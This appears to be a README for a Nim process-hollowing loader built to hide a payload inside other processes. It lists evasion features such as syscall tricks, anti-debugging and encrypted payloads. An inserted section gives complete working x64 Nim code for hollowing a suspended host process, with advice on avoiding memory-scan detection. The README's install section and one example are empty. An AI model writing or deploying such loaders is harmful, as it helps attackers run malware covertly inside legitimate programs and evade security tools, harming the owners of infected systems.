PichichiH0ll0wer: Nim process hollowing loader


PichichiH0ll0wer

Process hollowing loader written in Nim; the payload must be a PE (EXE) file.

PichichiH0ll0wer has some features to protect your payload.

Features

  • Configurable builder
  • Payload is encrypted and compressed (and optionally split) inside the hollow loader
  • Supports split injection across multiple processes
  • Supports direct and indirect system calls
  • The hollower does not call the very suspicious Nt/ZwUnmapViewOfSection
  • Can build EXE / DLL hollow loaders
  • Can block DLLs not signed by Microsoft from being loaded into the hollowed process
  • Anti-debug techniques: on detection the loader either exits or runs useless calculations ('troll' mode)
  • Obfuscated sleep using useless calculations
  • Supports execution from within a VEH (vectored exception handler)
  • Supports passing the RC4 key on the command line to decrypt the payload

Injection methods

  1. Simple hollowing: the usual chain against a host process created suspended: VirtualAlloc -> WriteProcessMemory -> GetThreadContext -> SetThreadContext -> ResumeThread.
  2. Direct syscalls hollowing: using the great NimlineWhispers2.
  3. Indirect syscalls hollowing: using the great NimlineWhispers3.
  4. Split hollowing: each step of method (1) runs in a separate process, with the host's handles passed down by inheritance.
  5. Split hollowing: each step of method (2) runs in a separate process, with the host's handles passed down by inheritance.
  6. Split hollowing: each step of method (3) runs in a separate process, with the host's handles passed down by inheritance.
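As an added example, not PichichiH0ll0wer's own code: a minimal x64 implementation of method (1) in Nim. It assumes the winim package (`nimble install winim`) for the Win32 bindings, a 64-bit host and a 64-bit PE payload that carries a .reloc section. It keeps the point made in the feature list above: there is no Nt/ZwUnmapViewOfSection call. The payload is mapped at its preferred base if that is free, otherwise at a fresh base with its relocations applied, and the PEB's ImageBaseAddress plus the suspended thread's entry-point register are patched instead of unmapping the host image. The PEB offset and the Rcx/Rdx convention for a suspended x64 main thread are documented facts about Windows, not project details.

```nim
# Added example (not PichichiH0ll0wer's code). Assumes winim; hollow.exe <host> <payload.exe>
# Build: nim c -d:release --cpu:amd64 hollow.nim
import winim/lean
import os

const
  PebImageBaseOffset = 0x10'u64   # PEB.ImageBaseAddress on x64
  RelBasedDir64 = 10              # IMAGE_REL_BASED_DIR64

proc fatal(msg: string) =
  stderr.writeLine(msg & " (GetLastError=" & $GetLastError() & ")")
  quit(1)

proc buildImage(payload: string, newBase: uint64): seq[byte] =
  ## Lay the PE out as it will look in memory, then relocate it to newBase.
  let dos = cast[ptr IMAGE_DOS_HEADER](unsafeAddr payload[0])
  let nt = cast[ptr IMAGE_NT_HEADERS64](unsafeAddr payload[int(dos.e_lfanew)])
  let opt = addr nt.OptionalHeader
  result = newSeq[byte](int(opt.SizeOfImage))
  copyMem(addr result[0], unsafeAddr payload[0], int(opt.SizeOfHeaders))
  # Section table starts right after the optional header.
  let sections = cast[ptr UncheckedArray[IMAGE_SECTION_HEADER]](
    cast[uint](opt) + uint(nt.FileHeader.SizeOfOptionalHeader))
  for i in 0 ..< int(nt.FileHeader.NumberOfSections):
    let s = sections[i]
    if s.SizeOfRawData > 0:
      copyMem(addr result[int(s.VirtualAddress)],
              unsafeAddr payload[int(s.PointerToRawData)], int(s.SizeOfRawData))
  let delta = newBase - opt.ImageBase        # wraps modulo 2^64, which is what we want
  if delta == 0: return
  let relocDir = opt.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]
  if relocDir.Size == 0:
    fatal("preferred base unavailable and payload has no .reloc section")
  var off = int(relocDir.VirtualAddress)
  let endOff = off + int(relocDir.Size)
  while off < endOff:
    let blk = cast[ptr IMAGE_BASE_RELOCATION](addr result[off])
    if blk.SizeOfBlock == 0: break
    let entries = cast[ptr UncheckedArray[uint16]](addr result[off + sizeof(IMAGE_BASE_RELOCATION)])
    let count = (int(blk.SizeOfBlock) - sizeof(IMAGE_BASE_RELOCATION)) div 2
    for j in 0 ..< count:
      let e = entries[j]
      if (e shr 12) == RelBasedDir64:        # type 0 (ABSOLUTE) is padding, skip it
        let p = cast[ptr uint64](addr result[int(blk.VirtualAddress) + int(e and 0xFFF)])
        p[] += delta
    off += int(blk.SizeOfBlock)

proc hollow(hostPath, payloadPath: string) =
  let payload = readFile(payloadPath)
  let dos = cast[ptr IMAGE_DOS_HEADER](unsafeAddr payload[0])
  if dos.e_magic != IMAGE_DOS_SIGNATURE: fatal("payload is not a PE")
  let nt = cast[ptr IMAGE_NT_HEADERS64](unsafeAddr payload[int(dos.e_lfanew)])
  if nt.Signature != IMAGE_NT_SIGNATURE or nt.FileHeader.Machine != IMAGE_FILE_MACHINE_AMD64:
    fatal("payload must be a 64-bit PE")

  # Step 0: host process created suspended; its main thread sits in RtlUserThreadStart.
  var si: STARTUPINFOA
  si.cb = DWORD(sizeof(si))
  var pi: PROCESS_INFORMATION
  var cmd = hostPath
  if CreateProcessA(nil, cmd.cstring, nil, nil, FALSE, CREATE_SUSPENDED,
                    nil, nil, addr si, addr pi) == 0:
    fatal("CreateProcessA failed")

  # Step 1: VirtualAllocEx. Try the preferred ImageBase first; otherwise let the
  # kernel choose and rely on relocations. RWX is used for brevity only.
  let size = SIZE_T(nt.OptionalHeader.SizeOfImage)
  var base = VirtualAllocEx(pi.hProcess, cast[LPVOID](nt.OptionalHeader.ImageBase),
                            size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  if base == nil:
    base = VirtualAllocEx(pi.hProcess, nil, size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  if base == nil: fatal("VirtualAllocEx failed")
  let newBase = cast[uint64](base)

  # Step 2: WriteProcessMemory of the relocated image.
  var image = buildImage(payload, newBase)
  var written: SIZE_T
  if WriteProcessMemory(pi.hProcess, base, addr image[0], size, addr written) == 0:
    fatal("WriteProcessMemory failed")

  # Step 3/4: GetThreadContext / SetThreadContext. On a suspended x64 thread
  # Rdx holds the PEB and Rcx the entry point RtlUserThreadStart will call.
  var ctx: CONTEXT
  ctx.ContextFlags = CONTEXT_FULL
  if GetThreadContext(pi.hThread, addr ctx) == 0: fatal("GetThreadContext failed")
  let pebImageBase = cast[LPVOID](ctx.Rdx + PebImageBaseOffset)
  if WriteProcessMemory(pi.hProcess, pebImageBase, unsafeAddr newBase, SIZE_T(8), addr written) == 0:
    fatal("PEB ImageBaseAddress update failed")
  ctx.Rcx = newBase + uint64(nt.OptionalHeader.AddressOfEntryPoint)
  if SetThreadContext(pi.hThread, addr ctx) == 0: fatal("SetThreadContext failed")

  # Step 5: ResumeThread. The host's own image stays mapped but is never entered.
  discard ResumeThread(pi.hThread)
  discard CloseHandle(pi.hThread)
  discard CloseHandle(pi.hProcess)

when isMainModule:
  if paramCount() != 2:
    stderr.writeLine("usage: hollow <host.exe> <payload.exe>")
    quit(1)
  hollow(paramStr(1), paramStr(2))
```

Two caveats a practitioner should keep in mind. The single PAGE_EXECUTE_READWRITE region is a strong memory-scan signal; a production loader maps the headers read-only and each section with its own characteristics. And the payload's imports are resolved by the Windows loader only because the PEB ImageBaseAddress is repointed before the thread runs; if the payload depends on TLS callbacks or on a different subsystem than the host, that is where it will break first.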

An example of split hollowing: cscript.exe is hollowed with cmd.exe, which then spawns whoami.exe:

Install & Use

Copyright (c) 2022 Itay Migdal